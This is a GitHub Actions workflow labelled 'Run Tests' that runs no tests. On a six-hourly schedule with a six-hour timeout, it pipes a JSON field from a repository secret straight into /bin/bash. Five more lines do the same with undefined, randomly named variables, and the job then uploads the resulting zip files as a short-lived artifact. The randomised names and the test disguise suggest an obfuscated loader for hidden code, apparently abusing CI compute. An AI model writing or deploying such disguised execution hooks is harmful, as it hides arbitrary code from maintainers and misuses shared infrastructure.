name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '18 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          t67: ${{ secrets.t67 }}
        run: |
          printf '%s' "$t67" | jq -r .ob9 | /bin/bash
          printf '%s' "$pzv14736" | jq -r .xgtfr47 | /bin/bash
          echo $x7776 | jq -r .qi68007 | /bin/bash
          echo $jy320 | jq -r .zrdz3 | /bin/bash
          echo $p24029 | jq -r .k55 | /bin/bash
          printf '%s' "$qsieu1" | jq -r .fr271 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: WJZjGKnm
          path: "*.zip"
          retention-days: 1
